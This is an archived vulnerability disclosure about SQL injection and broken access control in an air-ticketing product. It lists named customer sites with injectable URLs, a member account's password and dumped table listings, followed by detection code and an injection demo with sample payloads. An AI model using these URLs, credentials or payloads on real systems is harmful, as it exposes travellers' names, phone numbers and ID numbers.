
Vulnerability summary

Defect ID: wooyun-2015-0101951

Title: A third-party ticketing system: generic broken access control and two SQL injections leak large volumes of order data (name, phone number, ID number, flight number, departure time, etc.)

Vendor: a third-party ticketing system

Author: HackBraid

Submitted: 2015-03-17 22:20

Fixed: 2015-06-18 17:44

Published: 2015-06-18 17:44

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: handed to a third-party partner organisation (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help please contact [email protected]



Vulnerability details

Disclosure status:

2015-03-17: Details reported to the vendor; awaiting vendor handling
2015-03-20: Vendor confirmed; details visible to the vendor only
2015-03-23: Details opened to third-party security partners
2015-05-14: Details opened to core white hats and domain experts
2015-05-24: Details opened to regular white hats
2015-06-03: Details opened to intern white hats
2015-06-18: Details made public

Brief description:

As titled.
Broken access control leaks large volumes of sensitive data.
SQL injection; no login required.

Detailed description:

http://www.piaoyou.org/case_web.htm lists the customer deployments (cases) of the Piaoyou software.
Register an account and log in: the system has broken access control and a large number of SQL injections through which many orders can be viewed.
All of the injections come from the query forms:
Injection 1:

/Json_db/other_report.aspx?its=1&stype=&dfs=0&sdate=2015-3-17&edate=2015-3-17&fs=&keyword=1&col=id,subject,name,kefu,sales,hc,hb,qforder,total,ysmoney,stype,sdate,content&_search=false&nd=1426583717093&rows=25&page=1&sidx=id&sord=desc


Injection 2:

/Json_db/flight_search.aspx?stype=&ptype=&ddw=1&sdate=2015-3-17&edate=2015-3-17&fs=&keyword=&_search=false&nd=1426585534292&rows=18&page=1&sidx=id&sord=desc


Proof of vulnerability:

All of these are flight-ticket query pages. The cases below are taken from the Piaoyou customer list; in every one the parameter at fault is stype.
1. http://www.8800000.com/member/pnr.aspx?stype=0 (this one requires registering a member account; member number 18202657883, password also 18202657883)

[screenshot: p.jpg]


At first the page looked unremarkable, but appending a ' to the stype parameter produced a surprise: more than 10,000 orders could be enumerated:

[screenshot: p1.jpg]


All of them just paid for, flights not yet departed:

[screenshot: p2.jpg]


2.http://www.h-h.com.cn/Json_db/other_report.aspx?its=1&stype=&dfs=0&sdate=2015-3-17&edate=2015-3-17&fs=&keyword=1&col=id,subject,name,kefu,sales,hc,hb,qforder,total,ysmoney,stype,sdate,content&_search=false&nd=1426583717093&rows=25&page=1&sidx=id&sord=desc

Database: haihua_pek
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| dbo.money_mx | 131787 |
| dbo.sfkmx_view | 123886 |
| dbo.pnr_history | 118708 |
| dbo.pnr_history | 118708 |
| dbo.pnrdetail | 59132 |
| dbo.view_scgq | 59132 |
| dbo.viewbmpnr | 59132 |
| dbo.view_js | 57321 |
| dbo.viewpnr | 37427 |
| dbo.Hotel_LandMarks | 28601 |
| dbo.pay_money_main | 19497 |
| dbo.pay_money_main | 19497 |
| dbo.view_pay_mx_main | 19497 |
| dbo.cjr_login | 18873 |
| dbo.soupiaoren | 18873 |
| dbo.viewcjr | 18873 |
| dbo.Hotel_StaticInfos | 13442 |
| dbo.sfkmx_other_view | 7901 |
| dbo.ft_City | 5865 |
| dbo.view_tuipiao | 4614 |
| dbo.tuipiao | 4602 |
| dbo.member_yu | 4195 |
| dbo.view_member_yu | 4195 |
| dbo.ft_TAPrice | 4063 |
| dbo.traininfo | 2204 |
| dbo.yc_group | 1303 |
| dbo.System_Warn | 1104 |
| dbo.aircity | 1070 |
| dbo.Roles_flag | 1045 |
| dbo.Roles_flag | 1045 |
| dbo.Hotel_City | 621 |
| dbo.Hotel_City | 621 |
| dbo.sms_key | 468 |
| dbo.sms_key | 468 |
| dbo.xcd_ps_main | 454 |
| dbo.sfk_submit_mx | 405 |
| dbo.sfk_submit_mx | 405 |
| dbo.money_other | 337 |
| dbo.pay_money_other | 337 |
| dbo.company_clk | 313 |
| dbo.viewother | 307 |
| dbo.piaobei | 204 |
| dbo.cw_gd | 189 |
| dbo.airpiao | 186 |
| dbo.tourday | 185 |
| dbo.Airways | 183 |
| dbo.sys_nav | 135 |
| dbo.Visor | 131 |
| dbo.books | 116 |
| dbo.salestable | 76 |
| dbo.Tplanetype | 50 |
| dbo.air_cab_class | 49 |
| dbo.air_cab_class | 49 |
| dbo.menu_s | 44 |
| dbo.tourlist | 41 |
| dbo.plane_xinhao | 35 |
| dbo.orders_design | 32 |
| dbo.Bank | 28 |
| dbo.contact_info | 28 |
| dbo.Notebook | 26 |
| dbo.oa_item | 26 |
| dbo.view_kefu | 24 |
| dbo.Hotel_PageSumInfo | 20 |
| dbo.bm_login | 19 |
| dbo.company_bm | 19 |
| dbo.gjticket | 19 |
| dbo.viewgjticket | 19 |
| dbo.tournews | 18 |
| dbo.bx_base | 16 |
| dbo.link | 16 |
| dbo.cwkou | 15 |
| dbo.tourline | 15 |
| dbo.company_flag | 14 |
| dbo.payfs | 14 |
| dbo.bx_product | 13 |
| dbo.menu_b | 13 |
| dbo.resms | 12 |
| dbo.cgimg | 10 |
| dbo.otherclass | 10 |
| dbo.cjrcard | 9 |
| dbo.jbitem | 9 |
| dbo.system_tx | 9 |
| dbo.travel_money | 8 |
| dbo.kefubm | 6 |
| dbo.Report_mb_member | 6 |
| dbo.Report_mb_member | 6 |
| dbo.wtgroup | 6 |
| dbo.ptype_set | 5 |
| dbo.shop_smallclass | 5 |
| dbo.wttgclass | 5 |
| dbo.b2b_users | 4 |
| dbo.company_center | 4 |
| dbo.tourclass | 4 |
| dbo.travel_order_detail | 4 |
| dbo.travel_order_detail | 4 |
| dbo.view_travel_order | 4 |
| dbo.message_mb | 3 |
| dbo.tourbig | 3 |
| dbo.fax_submit | 2 |
| dbo.Invoice | 2 |
| dbo.shop_bigclass | 2 |
| dbo.admin | 1 |
| dbo.ft_Config | 1 |
| dbo.OtherParm | 1 |
| dbo.System_info | 1 |
| dbo.travel_item | 1 |
+--------------------------------------------------+---------+
Database: master
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| sys.messages | 76640 |
| sys.sysmessages | 76640 |
| sys.syscolumns | 10759 |
| sys.all_parameters | 6761 |
| sys.system_parameters | 6761 |
| sys.trace_subclass_values | 4729 |
| sys.trace_event_bindings | 3965 |
| sys.all_columns | 3793 |
| sys.system_columns | 3749 |
| sys.syscomments | 2793 |
| dbo.spt_values | 2346 |
| sys.all_objects | 1779 |
| sys.sysobjects | 1779 |
| sys.system_objects | 1773 |
| sys.database_permissions | 1675 |
| sys.syspermissions | 1675 |
| sys.sysprotects | 1674 |
| sys.all_sql_modules | 1621 |
| sys.system_sql_modules | 1621 |
| sys.all_views | 286 |
| sys.system_views | 286 |
| sys.event_notification_event_types | 193 |
| sys.trace_events | 171 |
| sys.syscharsets | 114 |
| sys.allocation_units | 112 |
| sys.partitions | 101 |
| sys.system_components_surface_area_configuration | 99 |
| sys.xml_schema_facets | 97 |
| sys.xml_schema_components | 93 |
| sys.xml_schema_types | 77 |
| sys.trace_columns | 65 |
| sys.configurations | 63 |
| sys.sysconfigures | 63 |
| sys.syscurconfigs | 63 |
| sys.fulltext_document_types | 50 |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES | 44 |
| INFORMATION_SCHEMA.COLUMNS | 44 |
| sys.columns | 44 |
| sys.syslanguages | 33 |
| sys.systypes | 27 |
| sys.types | 27 |
| sys.securable_classes | 21 |
| sys.trace_categories | 21 |
| sys.fulltext_languages | 17 |
| sys.xml_schema_component_placements | 17 |
| INFORMATION_SCHEMA.SCHEMATA | 14 |
| sys.database_principals | 14 |
| sys.schemas | 14 |
| sys.sysusers | 14 |
| sys.xml_schema_attributes | 14 |
| sys.server_principals | 11 |
| sys.service_contract_message_usages | 11 |
| sys.server_permissions | 7 |
| sys.sysindexes | 7 |
| sys.database_recovery_status | 6 |
| sys.databases | 6 |
| sys.indexes | 6 |
| sys.objects | 6 |
| sys.stats_columns | 6 |
| sys.stats_columns | 6 |
| sys.sysdatabases | 6 |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES | 5 |
| INFORMATION_SCHEMA.TABLES | 5 |
| sys.index_columns | 5 |
| sys.sysindexkeys | 5 |
| sys.tables | 5 |
| sys.endpoints | 4 |
| sys.service_queue_usages | 3 |
| sys.syssegments | 3 |
| sys.xml_schema_namespaces | 3 |
| sys.database_files | 2 |
| sys.login_token | 2 |
| sys.service_contract_usages | 2 |
| sys.sql_logins | 2 |
| sys.sysfiles | 2 |
| sys.syslogins | 2 |
| sys.user_token | 2 |
| dbo.spt_monitor | 1 |
| sys.data_spaces | 1 |
| sys.database_role_members | 1 |
| sys.default_constraints | 1 |
| sys.dm_exec_requests | 1 |
| sys.dm_exec_sessions | 1 |
| sys.filegroups | 1 |
| sys.server_role_members | 1 |
| sys.servers | 1 |
| sys.sysconstraints | 1 |
| sys.sysfilegroups | 1 |
| sys.sysmembers | 1 |
| sys.sysprocesses | 1 |
| sys.sysservers | 1 |
| sys.tcp_endpoints | 1 |
| sys.via_endpoints | 1 |
| sys.xml_schema_collections | 1 |
| sys.xml_schema_model_groups | 1 |
| sys.xml_schema_wildcards | 1 |
+--------------------------------------------------+---------+
Database: msdb
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| dbo.backupfile | 30 |
| dbo.backupmediafamily | 15 |
| dbo.backupmediaset | 15 |
| dbo.backupset | 15 |
+--------------------------------------------------+---------+


Large volume of sensitive data:

[screenshot: p3.jpg]


3.http://www.4008836868.com/Json_db/other_report.aspx?its=1&stype=&dfs=0&sdate=2015-3-17&edate=2015-3-17&fs=&keyword=1&col=id,subject,name,kefu,sales,hc,hb,qforder,total,ysmoney,stype,sdate,content&_search=false&nd=1426583717093&rows=25&page=1&sidx=id&sord=desc

[screenshot: s.jpg]


4.http://hhcl.h-h.com.cn/Json_db/other_report.aspx?its=1&stype=&dfs=0&sdate=2015-3-17&edate=2015-3-17&fs=&keyword=1&col=id,subject,name,kefu,sales,hc,hb,qforder,total,ysmoney,stype,sdate,content&_search=false&nd=1426583717093&rows=25&page=1&sidx=id&sord=desc

[screenshot: s1.jpg]


5.http://www.h-h.com.cn/Json_db/flight_search.aspx?stype=&ptype=&ddw=1&sdate=2015-3-17&edate=2015-3-17&fs=&keyword=&_search=false&nd=1426585534292&rows=18&page=1&sidx=id&sord=desc

[screenshot: s.jpg]


6.http://www.4008836868.com/Json_db/flight_search.aspx?stype=&ptype=&ddw=1&sdate=2015-3-17&edate=2015-3-17&fs=&keyword=&_search=false&nd=1426585534292&rows=18&page=1&sidx=id&sord=desc

[screenshot: s2.jpg]


7.http://hhcl.h-h.com.cn/Json_db/flight_search.aspx?stype=&ptype=&ddw=1&sdate=2015-3-17&edate=2015-3-17&fs=&keyword=&_search=false&nd=1426585534292&rows=18&page=1&sidx=id&sord=desc

[screenshot: s3.jpg]
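For the defender's side of the cases above, here is an added example (not part of the original report, and not code from the Piaoyou product): Python detection logic for the two behaviours the proof demonstrates, a quote or comment sequence landing in the stype parameter of the three named endpoints, and one client pulling page after page from the order endpoints. The field layout (date time method uri-stem uri-query username client-ip status) is an assumed subset of the IIS W3C fields, and the sample log lines are constructed for the demo.

```python
"""Added example, not part of the original report: detection logic for the
quote/comment probing of the stype parameter and for bulk pulling of order
pages from one client, run over constructed IIS-style log lines.  The field
layout (date time method uri-stem uri-query username client-ip status) is an
assumed subset of the W3C fields; the sample lines are made up for the demo."""
import re
from collections import Counter
from urllib.parse import parse_qs

# The three endpoints named in the report, compared case-insensitively.
WATCHED = {"/json_db/other_report.aspx", "/json_db/flight_search.aspx",
           "/member/pnr.aspx"}

# Quote, comment and statement separators plus two high-signal keyword pairs.
# Bare OR/AND are deliberately left out: too noisy on free-text search fields.
SQLI = re.compile(r"'|--|/\*|;|\bunion\s+select\b|\bwaitfor\s+delay\b", re.I)

# Constructed sample log: one benign report query, one benign order lookup,
# the report's lone-quote probe, two encoded boolean payloads, one benign search.
SAMPLE_LOG = """\
2015-03-17 14:35:17 GET /Json_db/other_report.aspx its=1&stype=&dfs=0&sdate=2015-3-17&edate=2015-3-17&fs=&keyword=1&rows=25&page=1&sidx=id&sord=desc member01 10.0.0.5 200
2015-03-17 14:35:30 GET /member/pnr.aspx stype=0 member01 10.0.0.5 200
2015-03-17 14:35:41 GET /member/pnr.aspx stype=0' member01 10.0.0.5 500
2015-03-17 14:36:02 GET /Json_db/flight_search.aspx stype=%27%20OR%20%271%27%3D%271&ptype=&ddw=1&rows=18&page=1&sidx=id&sord=desc - 10.0.0.5 200
2015-03-17 14:36:10 GET /Json_db/other_report.aspx its=1&stype=0%29%20AND%201%3D1--&dfs=0&rows=25&page=1 - 10.0.0.5 200
2015-03-17 14:37:00 GET /Json_db/flight_search.aspx stype=&ptype=&ddw=1&keyword=beijing&rows=18&page=1&sidx=id&sord=desc member02 10.0.0.9 200
"""


def parse_line(line):
    """Split one log line into named fields (the query is left URL-encoded)."""
    date, time, method, stem, query, user, ip, status = line.split(" ")
    return {"ts": f"{date} {time}", "method": method, "stem": stem,
            "query": query, "user": user, "ip": ip, "status": int(status)}


def find_injection(records):
    """Return (timestamp, stem, param, decoded value) for every parameter of a
    watched endpoint whose URL-decoded value matches the SQLi pattern."""
    hits = []
    for r in records:
        if r["stem"].lower() not in WATCHED:
            continue
        params = parse_qs(r["query"], keep_blank_values=True)  # decodes %xx
        for name, values in params.items():
            for value in values:
                if SQLI.search(value):
                    hits.append((r["ts"], r["stem"], name, value))
    return hits


def enumeration_suspects(records, threshold):
    """Clients with more than `threshold` requests to the watched endpoints.
    With the member scope missing, the rows/page parameters make bulk export
    of the order table cheap.  The threshold is an assumed tuning value."""
    counts = Counter(r["ip"] for r in records if r["stem"].lower() in WATCHED)
    return {ip: n for ip, n in counts.items() if n > threshold}


if __name__ == "__main__":
    recs = [parse_line(l) for l in SAMPLE_LOG.splitlines()]
    for hit in find_injection(recs):
        print("SQLi probe:", hit)
    print("enumeration:", enumeration_suspects(recs, threshold=3))
```

Matching on the decoded value matters: both payloads in the sample arrive percent-encoded and would slip past a rule applied to the raw query string. The volume rule is the one that would have caught the 10,000-order walk on pnr.aspx even without any quote in the request, since a legitimate member has no reason to page through the whole table.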

Fix recommendation:

Sanitise the parameters: bind stype and the other form fields as query parameters instead of concatenating them into the SQL, and scope order lookups to the logged-in member.

Copyright: please credit HackBraid@WooYun when reposting.
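The following is an added example illustrating both the stype injection from the detailed description and the fix recommended here; it is not code from the report or from the Piaoyou product. Python over an in-memory SQLite table stands in for the real ASP.NET plus SQL Server stack, and the table, columns, member IDs and the set of legal stype values are all constructed for the demo.

```python
"""Added example (not code from the original report or from the Piaoyou
product): a minimal model of the order lookup behind pnr.aspx and
other_report.aspx, written in Python over an in-memory SQLite table rather
than the real ASP.NET + SQL Server stack.  Table, column, member and stype
values are constructed for the demo."""
import sqlite3

# jqGrid-style sort parameters (sidx/sord) are interpolated into ORDER BY and
# cannot be bound, so they get a whitelist (assumed column set).
ALLOWED_SORT = {"id", "name", "flight"}
ALLOWED_STYPE = {"0", "1"}   # assumed set of legal search types


def make_db():
    """Constructed sample data: two members, four orders."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE pnr (id INTEGER PRIMARY KEY, member_id INTEGER, "
        "stype TEXT, name TEXT, phone TEXT, flight TEXT)"
    )
    conn.executemany(
        "INSERT INTO pnr VALUES (?, ?, ?, ?, ?, ?)",
        [
            (1, 1001, "0", "Zhang San", "13800000001", "CA1234"),
            (2, 1001, "1", "Li Si", "13800000002", "MU5678"),
            (3, 2002, "0", "Wang Wu", "13800000003", "CZ3456"),
            (4, 2002, "0", "Zhao Liu", "13800000004", "HU7890"),
        ],
    )
    return conn


def vulnerable_query(conn, stype):
    """Both defects from the report: stype is concatenated into the SQL text,
    and the query is not scoped to the logged-in member at all."""
    sql = f"SELECT id, name, phone, flight FROM pnr WHERE stype = '{stype}'"
    return conn.execute(sql).fetchall()


def probe_breaks_query(conn, stype):
    """The report's first signal: a stray quote makes the statement fail."""
    try:
        vulnerable_query(conn, stype)
        return False
    except sqlite3.Error:
        return True


def hardened_query(conn, member_id, stype, sidx="id", sord="desc"):
    """Whitelist the values that must end up in SQL text, bind the rest, and
    scope every lookup to the authenticated member so that other members'
    orders are not reachable by any value of stype."""
    if stype not in ALLOWED_STYPE:
        raise ValueError("invalid stype")
    if sidx not in ALLOWED_SORT or sord.lower() not in ("asc", "desc"):
        raise ValueError("invalid sort")
    sql = (
        "SELECT id, name, phone, flight FROM pnr "
        f"WHERE member_id = ? AND stype = ? ORDER BY {sidx} {sord.lower()}"
    )
    return conn.execute(sql, (member_id, stype)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(len(vulnerable_query(db, "0")), "rows for stype=0 with no member scope")
    print(len(vulnerable_query(db, "0' OR '1'='1")), "rows with an OR payload")
    print(probe_breaks_query(db, "0'"), "<- a lone quote breaks the statement")
    print(hardened_query(db, 1001, "0"), "<- member 1001 sees only its own order")
```

Two points are worth separating. Binding stype as a parameter closes the injection, but on its own it still returns every member's orders for stype=0, which is the access-control half of the report; the `member_id = ?` predicate is what closes that. The `col=` column list and the sidx/sord sort parameters in the reported URLs also end up inside SQL text and cannot be bound, so they need the same whitelist treatment; the report only shows stype being injectable and says nothing about those.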


Vendor response

Vendor response:

Severity: High

Vulnerability Rank: 14

Confirmed: 2015-03-20 17:43

Vendor reply:

Latest status:

None yet